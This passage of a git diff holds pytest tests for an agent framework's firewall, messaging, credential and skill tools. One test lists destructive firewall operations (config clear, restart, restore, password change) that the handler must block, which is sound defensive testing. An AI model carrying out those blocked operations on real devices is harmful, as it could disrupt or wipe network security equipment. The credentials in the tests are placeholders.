+        text = '{"result": true, "authorization": "raw-token"}'
+
+        def json(self):
+            return {"result": True, "authorization": "raw-token"}
+
+    def fake_request(method: str, url: str, **kwargs: Any):
+        calls.append((method, url, kwargs.get("json"), kwargs.get("headers")))
+        return _Response()
+
+    client.session.request = fake_request
+    result = client.login()
+
+    assert result == {"result": True, "authorization": "***"}
+    assert calls == [("POST", "https://fw.example.com/API/login", {"user": "admin", "pwd": "secret"}, None)]
+    assert client.session.headers["Authorization"] == "raw-token"
+    assert "Bearer" not in client.session.headers["Authorization"]
+
+
+@pytest.mark.parametrize(
+    ("method", "path"),
+    [
+        ("POST", "/save_config"),
+        ("POST", "/change_password"),
+        ("POST", "/config_clear_common"),
+        ("POST", "/restart"),
+        ("POST", "/restore"),
+        ("POST", "/library_upgrade"),
+        ("PUT", "/license_config"),
+        ("PUT", "/ha_config"),
+        ("PUT", "/global_domain_block_switch"),
+        ("DELETE", "/session_monitor"),
+        ("POST", "/bgp_clear_bgp_route"),
+        ("POST", "/user_obj"),
+        ("POST", "/signature_event"),
+    ],
+)
+def test_raw_mutation_rejects_high_risk_fw_device_state_changes(
+    monkeypatch, method: str, path: str
+):
+    handler = _load_handler()
+    monkeypatch.setattr(handler, "get_client", lambda: pytest.fail("blocked raw mutation must not call FW"))
+
+    with pytest.raises(handler.FwApiError, match="does not support high-risk FW operations"):
+        handler.fw_call_mutation({"method": method, "path": path, "body": "{}"})
+
+
+def test_api_catalog_contains_full_fw_surface_and_known_problem_metadata():
+    handler = _load_handler()
+
+    catalog = handler.fw_api_catalog({}).output
+
+    resources = catalog["documented_rest_api_resources"]
+    assert resources["/sys_info"] == ["GET"]
+    assert {"GET", "POST", "PUT", "DELETE"} <= set(resources["/addressobj"])
+    assert {"GET", "POST", "PUT", "DELETE"} <= set(resources["/fwpolicy"])
+    assert {"GET", "POST", "DELETE"} <= set(resources["/bgp_info"])
+    assert "/save_config" in catalog["blocked_high_risk_resources"]
+    assert catalog["known_problem_resources"]["/domainBlackList"]["GET"]["http_status"] == 404
+
+
+@pytest.mark.asyncio
+async def test_api_readonly_group_dispatches_to_fw_get(monkeypatch):
+    handler = _load_handler()
+    calls: list[tuple[str, dict[str, Any] | None]] = []
+
+    class _FakeClient:
+        def get(self, path: str, query: dict[str, Any] | None = None) -> dict[str, Any]:
+            calls.append((path, query))
+            return {"result": True, "data": {"host_name": "FW-1"}}
+
+    monkeypatch.setattr(handler, "get_client", lambda: _FakeClient())
+
+    result: ToolResult = await handler.api_readonly(
+        ToolContext(session_id="s", message_id="m"),
+        action="fw_call_raw_readonly",
+        path="/sys_info",
+    )
+
+    assert result.success is True
+    assert result.output == {"result": True, "data": {"host_name": "FW-1"}}
+    assert calls == [("/sys_info", None)]
+
+
+@pytest.mark.asyncio
+async def test_specialized_actions_build_expected_fw_payloads(monkeypatch):
+    handler = _load_handler()
+    calls: list[tuple[str, str, dict[str, Any] | None, Any]] = []
+
+    class _FakeClient:
+        def request(
+            self,
+            method: str,
+            path: str,
+            query: dict[str, Any] | None = None,
+            body: Any = None,
+        ) -> dict[str, Any]:
+            calls.append((method, path, query, body))
+            return {"result": True, "data": [{"id": 101, "name": body.get("name") if isinstance(body, dict) else None}]}
+
+    monkeypatch.setattr(handler, "get_client", lambda: _FakeClient())
+
+    ctx = ToolContext(session_id="s", message_id="m")
+    address = await handler.objects(
+        ctx,
+        action="fw_addressobj_create",
+        name="tmp_addr",
+        addr="198.18.0.10",
+        desc="temp",
+    )
+    service = await handler.objects(
+        ctx,
+        action="fw_serviceobj_create",
+        name="tmp_svc",
+        sev_str="TCP/1-65535:65000-65001",
+    )
+    route = await handler.network(
+        ctx,
+        action="fw_static_route_create",
+        dst_ip="198.51.100.252/32",
+        nh_ip="198.18.10.2",
+    )
+
+    assert address.success is True
+    assert service.success is True
+    assert route.success is True
+    assert calls == [
+        ("POST", "/addressobj", None, {"name": "tmp_addr", "type": 0, "desc": "temp", "item": [{"addr": "0:198.18.0.10"}]}),
+        ("POST", "/serviceobj", None, {"name": "tmp_svc", "desc": "", "item": [{"sev_str": "TCP/1-65535:65000-65001"}]}),
+        ("POST", "/static_route?protocol=1", None, {"ip_vrf_name": "default", "dst_ip": "198.51.100.252/32", "nh_type": "0", "nh_ip": "198.18.10.2", "oif": "", "weigh": "1", "distance": "255", "monitor_name": ""}),
+    ]
diff --git a/tests/tool/test_agent_toolset.py b/tests/tool/test_agent_toolset.py
index 4e0cb7a47..869b8daa0 100644
--- a/tests/tool/test_agent_toolset.py
+++ b/tests/tool/test_agent_toolset.py
@@ -98,6 +98,7 @@ def test_builtin_agent_yaml_tool_names_match_current_registry_surface() -> None:
         "edit",
         "glob",
         "grep",
+        "im_send_message",
         "lsp",
         "memory_search",
         "question",
diff --git a/tests/tool/test_builtin_management_tools.py b/tests/tool/test_builtin_management_tools.py
index 85c9fc240..b1a61d86d 100644
--- a/tests/tool/test_builtin_management_tools.py
+++ b/tests/tool/test_builtin_management_tools.py
@@ -30,6 +30,15 @@ def test_lsp_remains_non_native_by_default() -> None:
     assert tool.info.native is False
 
 
+def test_task_remains_non_native_when_declared() -> None:
+    ToolRegistry.init()
+
+    tool = ToolRegistry.get("task")
+
+    assert tool is not None
+    assert tool.info.native is False
+
+
 def test_model_config_tools_remain_non_native_by_default() -> None:
     ToolRegistry.init()
 
@@ -37,3 +46,12 @@ def test_model_config_tools_remain_non_native_by_default() -> None:
         tool = ToolRegistry.get(name)
         assert tool is not None
         assert tool.info.native is False
+
+
+def test_session_manage_remains_native_when_declared() -> None:
+    ToolRegistry.init()
+
+    tool = ToolRegistry.get("session_manage")
+
+    assert tool is not None
+    assert tool.info.native is True
diff --git a/tests/tool/test_channel_message.py b/tests/tool/test_channel_message.py
new file mode 100644
index 000000000..a7dc1355c
--- /dev/null
+++ b/tests/tool/test_channel_message.py
@@ -0,0 +1,85 @@
+from types import SimpleNamespace
+from unittest.mock import AsyncMock, patch
+
+import pytest
+
+from flocks.channel.base import DeliveryResult
+from flocks.tool.channel.channel_message import (
+    _normalize_channel_type,
+    channel_message,
+)
+from flocks.tool.registry import ToolContext, ToolRegistry
+
+
+def test_channel_message_normalizes_weixin_aliases() -> None:
+    assert _normalize_channel_type("weixin") == "weixin"
+    assert _normalize_channel_type("微信") == "weixin"
+    assert _normalize_channel_type("wechat") == "weixin"
+    assert _normalize_channel_type("wx") == "weixin"
+
+
+def test_channel_message_normalizes_wecom_aliases() -> None:
+    assert _normalize_channel_type("wecom") == "wecom"
+    assert _normalize_channel_type("企业微信") == "wecom"
+    assert _normalize_channel_type("企微") == "wecom"
+    assert _normalize_channel_type("wechat_work") == "wecom"
+    assert _normalize_channel_type("wxwork") == "wecom"
+
+
+def test_channel_message_schema_includes_weixin() -> None:
+    schema = ToolRegistry.get_schema("channel_message")
+
+    assert schema is not None
+    assert "wecom" in schema.properties["channel_type"]["enum"]
+    assert "企业微信" in schema.properties["channel_type"]["enum"]
+    assert "weixin" in schema.properties["channel_type"]["enum"]
+    assert "微信" in schema.properties["channel_type"]["enum"]
+
+
+@pytest.mark.asyncio
+async def test_channel_message_exact_binding_filters_selected_chat_only() -> None:
+    bindings = [
+        SimpleNamespace(
+            session_id="ses_shared",
+            channel_id="feishu",
+            account_id="acct_1",
+            chat_id="chat_1",
+        ),
+        SimpleNamespace(
+            session_id="ses_shared",
+            channel_id="feishu",
+            account_id="acct_2",
+            chat_id="chat_2",
+        ),
+    ]
+    svc = SimpleNamespace(list_bindings=AsyncMock(return_value=bindings))
+    deliver_result = DeliveryResult(
+        channel_id="feishu",
+        message_id="msg_2",
+        chat_id="chat_2",
+    )
+
+    with patch(
+        "flocks.tool.channel.channel_message._http_session_send",
+        AsyncMock(return_value=None),
+    ), patch(
+        "flocks.channel.inbound.session_binding.SessionBindingService",
+        return_value=svc,
+    ), patch(
+        "flocks.channel.outbound.deliver.OutboundDelivery.deliver",
+        AsyncMock(return_value=[deliver_result]),
+    ) as deliver:
+        result = await channel_message(
+            ToolContext(session_id="ses_current", message_id="msg_1"),
+            session_id="ses_shared",
+            message="hello",
+            channel_type="feishu",
+            account_id="acct_2",
+            chat_id="chat_2",
+        )
+
+    assert result.success is True
+    deliver.assert_awaited_once()
+    out_ctx = deliver.await_args.args[0]
+    assert out_ctx.account_id == "acct_2"
+    assert out_ctx.to == "chat_2"
diff --git a/tests/tool/test_credential_context_config_override.py b/tests/tool/test_credential_context_config_override.py
index 064c099b2..20c89e89e 100644
--- a/tests/tool/test_credential_context_config_override.py
+++ b/tests/tool/test_credential_context_config_override.py
@@ -16,6 +16,7 @@
     _config_override,
     _config_override_service,
     _config_override_storage_key,
+    activate_device_credentials,
     get_config_override,
 )
 
@@ -136,3 +137,43 @@ def test_identical_service_and_storage_key():
     )
     assert get_config_override("tdp_api") is _SAMPLE_CONFIG
     assert get_config_override("other") is None
+
+
+@pytest.mark.asyncio
+async def test_activate_preserves_legacy_fields_not_in_current_schema(monkeypatch):
+    """Old device rows can keep using fields removed from a newer schema."""
+
+    async def _fake_credentials(_device_id: str):
+        return {
+            "storage_key": "ngtip_api_v5_1_5",
+            "service_id": "ngtip_api",
+            "verify_ssl": False,
+            "fields": {
+                "apikey": "legacy-key",
+                "query_apikey": "query-key",
+            },
+        }
+
+    monkeypatch.setattr(
+        "flocks.tool.device.store.get_device_credentials",
+        _fake_credentials,
+    )
+    monkeypatch.setattr(
+        "flocks.tool.credential_context._load_credential_fields",
+        lambda _storage_key: [
+            {
+                "key": "query_apikey",
+                "storage": "secret",
+                "secret_id": "ngtip_query_apikey",
+                "config_key": "queryApiKey",
+            }
+        ],
+    )
+
+    async with activate_device_credentials("dev-a") as active:
+        assert active is True
+        config = get_config_override("ngtip_api_v5_1_5")
+
+    assert config is not None
+    assert config["queryApiKey"] == "{secret:ngtip_query_apikey}"
+    assert config["apikey"] == "legacy-key"
diff --git a/tests/tool/test_device_plugin_index.py b/tests/tool/test_device_plugin_index.py
index 05f68632d..1015d7afa 100644
--- a/tests/tool/test_device_plugin_index.py
+++ b/tests/tool/test_device_plugin_index.py
@@ -339,8 +339,8 @@ async def test_device_list_auto_creates_user_device_plugin_instance(monkeypatch,
     app.include_router(device_routes.router, prefix="/api/devices")
     client = TestClient(app)
 
-    response = client.get("/api/devices?refresh=true")
-    repeated = client.get("/api/devices?refresh=true")
+    response = client.post("/api/devices/sync?refresh=true")
+    repeated = client.post("/api/devices/sync?refresh=true")
     devices = await list_devices()
 
     assert response.status_code == 200
@@ -352,10 +352,12 @@ async def test_device_list_auto_creates_user_device_plugin_instance(monkeypatch,
     assert devices[0].enabled is True
 
     delete_response = client.delete(f"/api/devices/{devices[0].id}")
-    after_delete = client.get("/api/devices?refresh=true")
+    sync_after_delete = client.post("/api/devices/sync?refresh=true")
+    after_delete = client.get("/api/devices")
     devices_after_delete = await list_devices()
 
     assert delete_response.status_code == 204
+    assert sync_after_delete.status_code == 200
     assert after_delete.status_code == 200
     assert after_delete.json() == []
     assert devices_after_delete == []
@@ -369,7 +371,7 @@ async def test_device_list_auto_creates_user_device_plugin_instance(monkeypatch,
             "fields": {},
         },
     )
-    after_manual_create = client.get("/api/devices?refresh=true")
+    after_manual_create = client.get("/api/devices")
 
     assert manual_create.status_code == 201
     assert len(after_manual_create.json()) == 1
diff --git a/tests/tool/test_device_tool_isolation.py b/tests/tool/test_device_tool_isolation.py
index c519222bb..cc8ab2bd3 100644
--- a/tests/tool/test_device_tool_isolation.py
+++ b/tests/tool/test_device_tool_isolation.py
@@ -8,8 +8,8 @@
 Fix: store per-device tool overrides in the ``device_tool_settings`` SQLite
 table (ON DELETE CASCADE cleans up automatically on device removal).  The
 override is checked at ToolRegistry.execute() time, AFTER the shared global
-tool_settings have been applied.  The in-memory ToolInfo.enabled remains a
-global/shared concept; per-device gates live exclusively in the execution path.
+tool_settings have been applied.  A per-device ``enabled=False`` row disables
+only that device; switch-on removes the row and follows global state.
 """
 
 from __future__ import annotations
@@ -319,15 +319,11 @@ async def _activate(did: str):
         )
 
         # Apply per-device DB setting.
-        from flocks.tool.device.store import (
-            delete_device_tool_setting,
-            set_device_tool_enabled,
-        )
+        from flocks.tool.device.store import set_device_tool_enabled
+
         await _insert_stub_device(device_id, storage_key)
-        if per_device_enabled is False:
-            await set_device_tool_enabled(device_id, tool_name, False)
-        elif per_device_enabled is True:
-            await delete_device_tool_setting(device_id, tool_name)
+        if per_device_enabled is not None:
+            await set_device_tool_enabled(device_id, tool_name, per_device_enabled)
 
         return await ToolRegistry.execute(tool_name, device_id=device_id)
 
@@ -378,15 +374,43 @@ async def test_per_device_disable_does_not_affect_other_device(
             "share the same storage_key (same plugin version)."
         )
 
-    async def test_global_disable_still_blocks_all_devices(
+    async def test_global_disable_still_blocks_without_per_device_enable(
         self, monkeypatch, db_env, isolated_registry
     ):
-        """Global tool_settings (enabled=False in registry) must still block ALL devices."""
-        tool = _device_tool("sangfor_af_login", "sangfor_af_v8_0_106", enabled=False)
-        monkeypatch.setattr(
-            "flocks.tool.registry.ToolRegistry.get", lambda _name: tool
+        """Global disabled state still blocks when the device has no override."""
+        result = await self._run_tool(
+            monkeypatch,
+            db_env,
+            storage_key="sangfor_af_v8_0_106",
+            device_id=str(uuid.uuid4()),
+            enabled_in_registry=False,
+            per_device_enabled=None,
         )
+        assert result.success is False
+        assert "disabled" in (result.error or "").lower()
 
-        result = await ToolRegistry.execute("sangfor_af_login", device_id=str(uuid.uuid4()))
+    async def test_legacy_per_device_enable_does_not_override_disabled_registry_tool(
+        self, monkeypatch, db_env, isolated_registry
+    ):
+        """Historical enabled=True rows must not bypass global disabled state."""
+        result = await self._run_tool(
+            monkeypatch,
+            db_env,
+            storage_key="sangfor_af_v8_0_106",
+            device_id=str(uuid.uuid4()),
+            enabled_in_registry=False,
+            per_device_enabled=True,
+        )
         assert result.success is False
         assert "disabled" in (result.error or "").lower()
+
+    async def test_device_tool_failures_do_not_disable_shared_tool(self):
+        tool = _device_tool("sangfor_af_login", "sangfor_af_v8_0_106", enabled=True)
+
+        for _ in range(ToolRegistry._failure_disable_threshold):
+            disabled = ToolRegistry._record_failure(
+                tool, {"device_id": "dev-a"}, "Request failed: 502 Bad Gateway"
+            )
+
+        assert disabled is False
+        assert tool.info.enabled is True
diff --git a/tests/tool/test_flocks_skills.py b/tests/tool/test_flocks_skills.py
index fe6c36cdd..8b5d585da 100644
--- a/tests/tool/test_flocks_skills.py
+++ b/tests/tool/test_flocks_skills.py
@@ -72,14 +72,27 @@ async def test_all_allowed_subcommands_accepted():
     )
 
     proc = make_proc(stdout=b"ok", returncode=0)
+    from flocks.skill.installer import SkillInstallResult
 
     with (
         patch("flocks.tool.skill.flocks_skills._flocks_executable", return_value="/usr/local/bin/flocks"),
         patch("flocks.tool.skill.flocks_skills.asyncio.create_subprocess_exec", return_value=proc),
+        patch(
+            "flocks.skill.installer.SkillInstaller.install_from_source",
+            AsyncMock(
+                return_value=SkillInstallResult(
+                    success=True,
+                    skill_name="demo",
+                    location="/tmp/demo/SKILL.md",
+                    message="installed",
+                )
+            ),
+        ),
     ):
         for sub in _ALLOWED_SUBCOMMANDS:
             ctx = make_ctx()
-            result = await flocks_skills(ctx, subcommand=sub, args="")
+            args = "github:owner/repo/demo" if sub == "install" else ""
+            result = await flocks_skills(ctx, subcommand=sub, args=args)
             assert result.success is True, f"subcommand {sub!r} should succeed"
             if sub in _READ_ONLY_SUBCOMMANDS:
                 ctx.ask.assert_not_called()
@@ -159,12 +172,12 @@ async def test_remove_appends_yes_for_non_interactive_tool_calls():
 @pytest.mark.asyncio
 async def test_nonzero_exit_returns_failure():
     from flocks.tool.skill.flocks_skills import flocks_skills
+    from flocks.skill.installer import SkillInstallResult
 
     ctx = make_ctx()
-    proc = make_proc(stderr=b"skill not found\n", returncode=1)
-    with (
-        patch("flocks.tool.skill.flocks_skills._flocks_executable", return_value="/usr/bin/flocks"),
-        patch("flocks.tool.skill.flocks_skills.asyncio.create_subprocess_exec", return_value=proc),
+    with patch(
+        "flocks.skill.installer.SkillInstaller.install_from_source",
+        AsyncMock(return_value=SkillInstallResult(success=False, error="skill not found")),
     ):
         result = await flocks_skills(ctx, subcommand="install", args="github:bad/source")
 
@@ -174,7 +187,29 @@ async def test_nonzero_exit_returns_failure():
 
 
 @pytest.mark.asyncio
-async def test_timeout_kills_process():
+async def test_install_timeout_returns_failure():
+    from flocks.tool.skill.flocks_skills import flocks_skills
+    from flocks.skill.installer import SkillInstallResult
+
+    ctx = make_ctx()
+    with patch(
+        "flocks.skill.installer.SkillInstaller.install_from_source",
+        AsyncMock(
+            return_value=SkillInstallResult(
+                success=False,
+                error="Command timed out after 45s",
+            )
+        ),
+    ):
+        result = await flocks_skills(ctx, subcommand="install", args="clawhub:slow-skill")
+
+    assert result.success is False
+    assert "timed out" in (result.error or "").lower()
+    ctx.ask.assert_called_once()
+
+
+@pytest.mark.asyncio
+async def test_remove_timeout_kills_process():
     from flocks.tool.skill.flocks_skills import flocks_skills
 
     ctx = make_ctx()
@@ -187,7 +222,7 @@ async def test_timeout_kills_process():
         patch("flocks.tool.skill.flocks_skills._flocks_executable", return_value="/usr/bin/flocks"),
         patch("flocks.tool.skill.flocks_skills.asyncio.create_subprocess_exec", return_value=proc),
     ):
-        result = await flocks_skills(ctx, subcommand="install", args="clawhub:slow-skill")
+        result = await flocks_skills(ctx, subcommand="remove", args="old-skill")
 
     assert result.success is False
     assert "timed out" in (result.error or "").lower()
diff --git a/tests/tool/test_im_send_message.py b/tests/tool/test_im_send_message.py
new file mode 100644
index 000000000..72df25a42
--- /dev/null
+++ b/tests/tool/test_im_send_message.py
@@ -0,0 +1,186 @@
+from unittest.mock import AsyncMock, patch
+
+import pytest
+
+from flocks.tool.channel.im_send_message import (
+    _Candidate,
+    _normalize_channel_type,
+    im_send_message,
+)
+from flocks.tool.registry import ToolContext, ToolRegistry, ToolResult
+
+
+def _ctx(session_id: str = "ses_current") -> ToolContext:
+    return ToolContext(session_id=session_id, message_id="msg_1")
+
+
+def _candidate(session_id: str = "ses_target", channel_id: str = "feishu") -> _Candidate:
+    return _Candidate(
+        session_id=session_id,
+        channel_id=channel_id,
+        account_id="default",
+        chat_type="group",
+        chat_id="chat_1",
+        title="Feishu project chat",
+        last_message_at=100.0,
+    )
+
+
+def test_im_send_message_is_registered() -> None:
+    tool = ToolRegistry.get("im_send_message")
+
+    assert tool is not None
+    schema = tool.info.get_schema()
+    assert "message" in schema.properties
+    assert "resolve_only" in schema.properties
+    assert "session_id" not in schema.required
+
+
+def test_im_send_message_normalizes_weixin_aliases() -> None:
+    assert _normalize_channel_type("weixin") == "weixin"
+    assert _normalize_channel_type("微信") == "weixin"
+    assert _normalize_channel_type("wechat") == "weixin"
+    assert _normalize_channel_type("wx") == "weixin"
+
+
+def test_im_send_message_normalizes_wecom_aliases() -> None:
+    assert _normalize_channel_type("wecom") == "wecom"
+    assert _normalize_channel_type("企业微信") == "wecom"
+    assert _normalize_channel_type("企微") == "wecom"
+    assert _normalize_channel_type("wechat_work") == "wecom"
+    assert _normalize_channel_type("wxwork") == "wecom"
+
+
+@pytest.mark.asyncio
+async def test_im_send_message_requires_message_unless_resolve_only() -> None:
+    result = await im_send_message(_ctx(), session_id="ses_target")
+
+    assert result.success is False
+    assert "message is required" in (result.error or "")
+
+
+@pytest.mark.asyncio
+async def test_im_send_message_resolve_only_returns_target() -> None:
+    candidate = _candidate()
+
+    with patch(
+        "flocks.tool.channel.im_send_message._list_candidates",
+        AsyncMock(return_value=[candidate]),
+    ):
+        result = await im_send_message(
+            _ctx(),
+            session_id="ses_target",
+            resolve_only=True,
+        )
+
+    assert result.success is True
+    assert "session_id=ses_target" in str(result.output)
+    assert result.metadata["target"]["channel_id"] == "feishu"
+
+
+@pytest.mark.asyncio
+async def test_im_send_message_reuses_channel_message_after_resolution() -> None:
+    candidate = _candidate()
+    send_result = ToolResult(success=True, output="sent")
+
+    with patch(
+        "flocks.tool.channel.im_send_message._list_candidates",
+        AsyncMock(return_value=[candidate]),
+    ), patch(
+        "flocks.tool.channel.channel_message.channel_message",
+        AsyncMock(return_value=send_result),
+    ) as channel_message:
+        result = await im_send_message(
+            _ctx(),
+            message="hello",
+            session_id="ses_target",
+        )
+
+    assert result is send_result
+    channel_message.assert_awaited_once()
+    _, kwargs = channel_message.await_args
+    assert kwargs["session_id"] == "ses_target"
+    assert kwargs["channel_type"] == "feishu"
+    assert kwargs["account_id"] == "default"
+    assert kwargs["chat_id"] == "chat_1"
+    assert kwargs["message"] == "hello"
+
+
+@pytest.mark.asyncio
+async def test_im_send_message_uses_current_im_session_by_default() -> None:
+    candidate = _candidate(session_id="ses_current", channel_id="wecom")
+    send_result = ToolResult(success=True, output="sent")
+
+    with patch(
+        "flocks.tool.channel.im_send_message._list_candidates",
+        AsyncMock(return_value=[candidate]),
+    ), patch(
+        "flocks.tool.channel.channel_message.channel_message",
+        AsyncMock(return_value=send_result),
+    ) as channel_message:
+        result = await im_send_message(_ctx(), message="hello")
+
+    assert result is send_result
+    _, kwargs = channel_message.await_args
+    assert kwargs["session_id"] == "ses_current"
+    assert kwargs["channel_type"] == "wecom"
+    assert kwargs["account_id"] == "default"
+    assert kwargs["chat_id"] == "chat_1"
+
+
+@pytest.mark.asyncio
+async def test_im_send_message_asks_when_multiple_targets_match() -> None:
+    first = _candidate(session_id="ses_first", channel_id="feishu")
+    second = _candidate(session_id="ses_second", channel_id="wecom")
+    question_result = ToolResult(
+        success=True,
+        output="answered",
+        metadata={"answers": [[second.label]]},
+    )
+    send_result = ToolResult(success=True, output="sent")
+
+    with patch(
+        "flocks.tool.channel.im_send_message._list_candidates",
+        AsyncMock(return_value=[first, second]),
+    ), patch(
+        "flocks.tool.channel.im_send_message._ask_user_to_choose",
+        AsyncMock(return_value=question_result),
+    ) as ask_user, patch(
+        "flocks.tool.channel.channel_message.channel_message",
+        AsyncMock(return_value=send_result),
+    ) as channel_message:
+        result = await im_send_message(_ctx(session_id="web_session"), message="hello")
+
+    assert result is send_result
+    ask_user.assert_awaited_once()
+    _, kwargs = channel_message.await_args
+    assert kwargs["session_id"] == "ses_second"
+    assert kwargs["channel_type"] == "wecom"
+    assert kwargs["account_id"] == "default"
+    assert kwargs["chat_id"] == "chat_1"
+
+
+@pytest.mark.asyncio
+async def test_im_send_message_stops_when_channel_question_is_deferred() -> None:
+    first = _candidate(session_id="ses_first", channel_id="feishu")
+    second = _candidate(session_id="ses_second", channel_id="wecom")
+    question_result = ToolResult(
+        success=True,
+        output="Question sent to the IM channel as plain text.",
+        metadata={"deferred": True, "channel_session": True},
+    )
+
+    with patch(
+        "flocks.tool.channel.im_send_message._list_candidates",
+        AsyncMock(return_value=[first, second]),
+    ), patch(
+        "flocks.tool.channel.im_send_message._ask_user_to_choose",
+        AsyncMock(return_value=question_result),
+    ), patch(
+        "flocks.tool.channel.channel_message.channel_message",
+        AsyncMock(),
+    ) as channel_message:
+        result = await im_send_message(_ctx(session_id="ses_channel"), message="hello")
+
+    assert result is question_result
+    channel_message.assert_not_awaited()
diff --git a/tests/tool/test_ngtip_api_tool.py b/tests/tool/test_ngtip_api_tool.py
index 6ae2dd94a..85ec29c4b 100644
--- a/tests/tool/test_ngtip_api_tool.py
+++ b/tests/tool/test_ngtip_api_tool.py
@@ -14,7 +14,7 @@ def _load_tool(yaml_name: str):
         / ".flocks"
         / "plugins"
         / "tools"
-        / "api"
+        / "device"
         / "ngtip_v5_1_5"
         / yaml_name
     )
@@ -62,6 +62,13 @@ def post(self, url, **kwargs):
         return self._responses.pop(0)
 
 
+def _secret_get(values: dict[str, str]):
+    def _get(name: str):
+        return values.get(name)
+
+    return _get
+
+
 @pytest.mark.asyncio
 async def test_ngtip_query_uses_ssl_false_by_default():
     tool = _load_tool("ngtip_query.yaml")
@@ -76,14 +83,17 @@ async def test_ngtip_query_uses_ssl_false_by_default():
         ]
     )
     mock_secret_manager = MagicMock()
-    mock_secret_manager.get.return_value = "apikey-1"
+    mock_secret_manager.get.side_effect = _secret_get(
+        {"ngtip_query_apikey": "query-key", "legacy-key": "legacy-key"}
+    )
 
     with (
         patch("flocks.security.get_secret_manager", return_value=mock_secret_manager),
         patch(
             "flocks.config.config_writer.ConfigWriter.get_api_service_raw",
             return_value={
-                "apiKey": "{secret:ngtip_apikey}",
+                "queryApiKey": "{secret:ngtip_query_apikey}",
+                "apiKey": "{secret:legacy-key}",
                 "query_base_url": "https://ngtip-query.local:8090",
             },
         ),
@@ -99,7 +109,7 @@ async def test_ngtip_query_uses_ssl_false_by_default():
     method, url, kwargs = fake_session.calls[0]
     assert method == "GET"
     assert url == "https://ngtip-query.local:8090/tip_api/v5/ip"
-    assert kwargs["params"] == {"apikey": "apikey-1", "resource": "8.8.8.8"}
+    assert kwargs["params"] == {"apikey": "query-key", "resource": "8.8.8.8"}
     assert kwargs["ssl"] is False
 
 
@@ -118,14 +128,17 @@ async def test_ngtip_platform_honors_verify_ssl_true():
         ]
     )
     mock_secret_manager = MagicMock()
-    mock_secret_manager.get.return_value = "apikey-1"
+    mock_secret_manager.get.side_effect = _secret_get(
+        {"ngtip_platform_apikey": "platform-key", "legacy-key": "legacy-key"}
+    )
 
     with (
         patch("flocks.security.get_secret_manager", return_value=mock_secret_manager),
         patch(
             "flocks.config.config_writer.ConfigWriter.get_api_service_raw",
             return_value={
-                "apiKey": "{secret:ngtip_apikey}",
+                "platformApiKey": "{secret:ngtip_platform_apikey}",
+                "apiKey": "{secret:legacy-key}",
                 "base_url": "https://ngtip.local",
                 "verify_ssl": True,
             },
@@ -144,8 +157,46 @@ async def test_ngtip_platform_honors_verify_ssl_true():
     assert method == "POST"
     assert url == "https://ngtip.local/tip/v5/add_user"
     assert kwargs["json"] == {
-        "apikey": "apikey-1",
+        "apikey": "platform-key",
         "username": "alice",
         "roles": ["admin"],
     }
     assert kwargs["ssl"] is True
+
+
+@pytest.mark.asyncio
+async def test_ngtip_uses_legacy_apikey_as_fallback():
+    tool = _load_tool("ngtip_query.yaml")
+    fake_session = _FakeSession(
+        [
+            _FakeResponse(
+                json_payload={
+                    "response_code": 0,
+                    "data": {"resource": "8.8.8.8", "intelligence": []},
+                }
+            )
+        ]
+    )
+    mock_secret_manager = MagicMock()
+    mock_secret_manager.get.side_effect = _secret_get({"ngtip_apikey": "legacy-key"})
+
+    with (
+        patch("flocks.security.get_secret_manager", return_value=mock_secret_manager),
+        patch(
+            "flocks.config.config_writer.ConfigWriter.get_api_service_raw",
+            return_value={
+                "apiKey": "{secret:ngtip_apikey}",
+                "query_base_url": "https://ngtip-query.local:8090",
+            },
+        ),
+        patch("aiohttp.ClientSession", return_value=fake_session),
+    ):
+        result = await tool.handler(
+            ToolContext(session_id="test", message_id="test"),
+            action="query_ip",
+            resource="8.8.8.8",
+        )
+
+    assert result.success is True
+    _, _, kwargs = fake_session.calls[0]
+    assert kwargs["params"]["apikey"] == "legacy-key"
diff --git a/tests/tool/test_onesig_api_tool.py b/tests/tool/test_onesig_api_tool.py
index 1f7441db3..ee8f85b46 100644
--- a/tests/tool/test_onesig_api_tool.py
+++ b/tests/tool/test_onesig_api_tool.py
@@ -43,7 +43,7 @@
     / ".flocks"
     / "plugins"
     / "tools"
-    / "api"
+    / "device"
     / "onesig_v2_5_3_D20260321"
     / "onesig.handler.py"
 )
@@ -115,6 +115,28 @@ def test_default_verify_ssl_is_off_for_private_deployments(handler):
     assert handler.DEFAULT_VERIFY_SSL is False
 
 
+def test_resolve_runtime_config_uses_current_open_box_defaults(handler, monkeypatch):
+    monkeypatch.delenv("ONESIG_API_PREFIX", raising=False)
+    monkeypatch.delenv("ONESIG_OAEP_HASH", raising=False)
+    raw_service = {
+        "base_url": "https://onesig.example.local/",
+        "username": "admin",
+        "password": "supersecret",
+    }
+    secret_manager = MagicMock()
+    secret_manager.get.return_value = None
+
+    with (
+        patch.object(handler.ConfigWriter, "get_api_service_raw", return_value=raw_service),
+        patch.object(handler, "_get_secret_manager", return_value=secret_manager),
+    ):
+        config = handler._resolve_runtime_config()
+
+    assert config.api_prefix == ""
+    assert config.oaep_hash == "sha256"
+    assert config.build_url("/v3/captcha") == "https://onesig.example.local/v3/captcha"
+
+
 # ---------------------------------------------------------------------------
 # _ssl_context: bool -> aiohttp ssl arg shape
 # ---------------------------------------------------------------------------
diff --git a/tests/tool/test_question_channel.py b/tests/tool/test_question_channel.py
new file mode 100644
index 000000000..50d5b6fee
--- /dev/null
+++ b/tests/tool/test_question_channel.py
@@ -0,0 +1,145 @@
+from types import SimpleNamespace
+from unittest.mock import AsyncMock, patch
+
+import pytest
+
+from flocks.tool.registry import ToolContext
+from flocks.tool.system import question as question_module
+from flocks.tool.system.question import normalize_question_option, question_tool
+
+
+def test_normalize_question_option_accepts_common_llm_shapes() -> None:
+    assert normalize_question_option({"value": "NVD", "desc": "Public CVE feed"}) == {
+        "label": "NVD",
+        "description": "Public CVE feed",
+    }
+    assert normalize_question_option({"text": "Internal scanner"}) == {
+        "label": "Internal scanner",
+        "description": "",
+    }
+    assert normalize_question_option({"description": "Only descriptive text"}) == {
+        "label": "Only descriptive text",
+        "description": "",
+    }
+    assert normalize_question_option({"label": ""}) is None
+
+
+@pytest.mark.asyncio
+async def test_question_tool_falls_back_to_text_when_choice_has_no_valid_options(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    captured_questions: list[dict] = []
+
+    async def fake_handler(_session_id: str, questions: list[dict]) -> list[list[str]]:
+        captured_questions.extend(questions)
+        return [["manual answer"]]
+
+    monkeypatch.setattr(question_module, "_question_handler", fake_handler)
+    monkeypatch.setattr(question_module, "_send_channel_question_if_applicable", AsyncMock(return_value=None))
+
+    with patch(
